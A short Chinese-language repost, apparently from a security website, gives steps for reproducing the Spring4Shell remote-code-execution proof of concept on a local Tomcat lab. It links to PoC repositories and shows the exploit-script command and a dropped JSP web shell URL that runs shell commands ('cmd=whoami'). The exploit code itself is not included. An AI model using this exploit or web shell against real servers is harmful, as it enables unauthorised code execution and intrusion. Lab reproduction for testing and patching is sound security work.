首页 >> 网络安全 >>漏洞利用 >> Spring4Shell POC
详细内容

Spring4Shell POC

时间:2022-03-31     【转载】   阅读

漏洞描述:https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html

POC的构建:https://github.com/BobTheShoplifter/Spring4Shell-POC


构建/运行的步骤

使用 JDK 11.0.14、Spring Boot 2.6.5 和 Apache Tomcat 9.0.60 测试


运行mvn clean package以构建应用程序

将此 .war 文件重命名并复制demo-0.0.1-SNAPSHOT.war到spring-poc.warTomcat 的 webapps 目录


运行python exp.py --url http://localhost:8080/spring-poc/greeting

如果成功,漏洞存在,shell地址为:http://localhost:8080/spring-poc/tomcatwar.jsp?pwd=j&cmd=whoami将记录该消息。


您现在应该看到tomcatwar.jsp写入 Tomcat 的 webapps/spring-poc 目录的文件。这个目录可以通过修改来改变exp.py。

1.png

日志消息

去url查看shell命令的结果

运行有效载荷

2.png

项目地址:https://github.com/ckkok/spring4shell-poc

技术支持: 建站ABC | 管理登录